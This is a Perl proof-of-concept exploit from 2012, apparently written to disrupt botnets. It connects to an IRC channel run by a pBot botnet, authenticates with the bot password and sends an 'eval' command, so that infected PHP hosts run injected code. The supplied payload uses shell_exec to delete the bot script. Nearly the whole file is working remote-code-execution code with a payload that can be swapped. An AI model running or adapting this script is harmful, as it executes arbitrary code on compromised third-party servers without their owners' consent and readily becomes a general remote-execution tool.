pBot RCE PoC

1. #!/usr/bin/perl
2. # Exploit Title: pBot Remote Code Execution ("*" hostauth)
3. # Date: 31.07.2012
4. # Exploit Author: @bwallHatesTwits
5. # Software Link: https://www.firebwall.com/decoding/read.php?u=620d21fd31b87046e94975e03fdafa8a (decoded from attempted attack)
6. # Version: Various versions
7. # Tested on: Linux 3.2
8.  
9. use IO::Socket;
10. use IO::Select;
11. use IO::Socket::INET;
12. use Socket;
13.  
14. my $nickname = "BotSlayer";
15. my $ident = "BotSlayer";
16. my $fullname = "BotSlayer";
17. $sel_client = IO::Select->new();
18.  
19. #configuration values from the bot source
20. $ircserver = "localhost";                   #"server"
21. $ircserverpass = "";                        #"pass"
22. my $ircport = "6667";                       #"port"
23. #if "key" is set, then add a space and the password to the chan name
24. my @channels = ("#anonbxu");                #"chan" and "chan2"
25. $botPass = "hello";                         #"password"
26. $botTrigger = ".";                          #"trigger"
27. #hostauth must be "*"
28. $loginCMD = "user";                         #usually user or login
29.  
30. #payload - PHP code to run
31. #This version deletes the bots originating script, and dies
32. $phpEval = "shell_exec(\"rm -f \".\$_SERVER['SCRIPT_NAME']);exit();";
33.  
34. $channelCount = scalar(@channels);
35.  
36. sub onJoin
37. {
38.     my $channel = shift;
39.     $channel = substr($channel, 1);
40.     print "Joined $channel\n";
41.     say($channel, $botTrigger.$loginCMD." $botPass");
42.     sleep(1);
43.     say($channel, $botTrigger."eval \@BallastSec ".$phpEval);
44.     print "Payload delivered\n";
45.     tryQuit();
46. }
47.  
48. sub tryQuit
49. {
50.     $channelCount--;
51.     if($channelCount == 0)
52.     {
53.         quit("whomp wha");
54.     }
55. }
56.  
57. sub sendraw
58. {
59.     if ($#_ == '1')
60.     {
61.         my $socket = $_[0];
62.         print $socket "$_[1]\n";
63.     }
64.     else
65.     {
66.         print $IRC_cur_socket "$_[0]\n";
67.     }
68. }
69.  
70. sub conn
71. {
72.     my $mynick = $_[0];
73.     my $ircserver_con = $_[1];
74.     my $ircport_con = $_[2];
75.     my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
76.     if (defined($IRC_socket))
77.     {
78.         $IRC_cur_socket = $IRC_socket;
79.         $IRC_socket->autoflush(1);
80.         $sel_client->add($IRC_socket);
81.         $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
82.         $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
83.         $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
84.         $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
85.         if($ircserverpass != "")
86.         {
87.             sendraw("PASS ".$ircserverpass);
88.         }
89.         sendraw("NICK ".$mynick);
90.         sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname");
91.         sleep 1;
92.     }
93. }
94.  
95. sub parse
96. {
97.     my $servarg = shift;
98.     print $servarg."\n";
99.     if ($servarg =~ /^PING \:(.*)/)
100.     {
101.         sendraw("PONG :$1");
102.     }
103.     elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) JOIN (.+)/)
104.     {
105.         my $channel = $4;
106.         onJoin($channel);
107.     }
108.     elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/)
109.     {
110.         my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
111.         if ($args =~ /^\001VERSION\001$/)
112.         {
113.             notice("$pn", "\001VERSION BotSlayer by Ballast Security\001");
114.         }
115.         if ($args =~ /^(\Q$mynick\E|\!a)\s+(.*)/ )
116.         {
117.             my $natrix = $1;
118.             my $arg = $2;
119.         }
120.     }
121.     elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i)
122.     {
123.         if (lc($1) eq lc($mynick))
124.         {
125.             $mynick=$4;
126.             $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
127.         }
128.     }
129.     elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i)
130.     {
131.         $mynick = $2;
132.         $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
133.         $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
134.         foreach(@channels)
135.         {
136.             sendraw("JOIN $_");
137.         }        
138.     }
139. }
140. my $line_temp;
141. while(1)
142. {
143.     while (!(keys(%irc_servers)))
144.     {
145.         conn($nickname, $ircserver, $ircport);
146.     }
147.     delete($irc_servers{''}) if (defined($irc_servers{''}));
148.     my @ready = $sel_client->can_read(0);
149.     next unless(@ready);
150.     foreach $fh (@ready)
151.     {
152.         $IRC_cur_socket = $fh;
153.         $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
154.         $nread = sysread($fh, $msg, 4096);
155.         if ($nread == 0) {
156.             $sel_client->remove($fh);
157.             $fh->close;
158.             delete($irc_servers{$fh});
159.         }
160.         @lines = split (/\n/, $msg);
161.         $msg =~ s/\r\n$//;
162.         for(my $c=0; $c<= $#lines; $c++)
163.         {
164.             $line = $lines[$c];
165.             $line=$line_temp.$line if ($line_temp);
166.             $line_temp='';
167.             $line =~ s/\r$//;
168.             parse("$line");
169.         }
170.     }
171. }
172.  
173. sub say
174. {
175.     return unless $#_ == 1;
176.     sendraw("PRIVMSG $_[0] :$_[1]");
177. }
178.  
179. sub notice
180. {
181.     return unless $#_ == 1;
182.     sendraw("NOTICE $_[0] :$_[1]");
183. }
184.  
185. sub join
186. {
187.     sendraw("JOIN $_[0]");
188. }
189.  
190. sub part
191. {
192.     sendraw("PART $_[0]");
193. }
194.  
195. sub quit
196. {
197.     sendraw("QUIT :$_[0]");
198.     exit;
199. }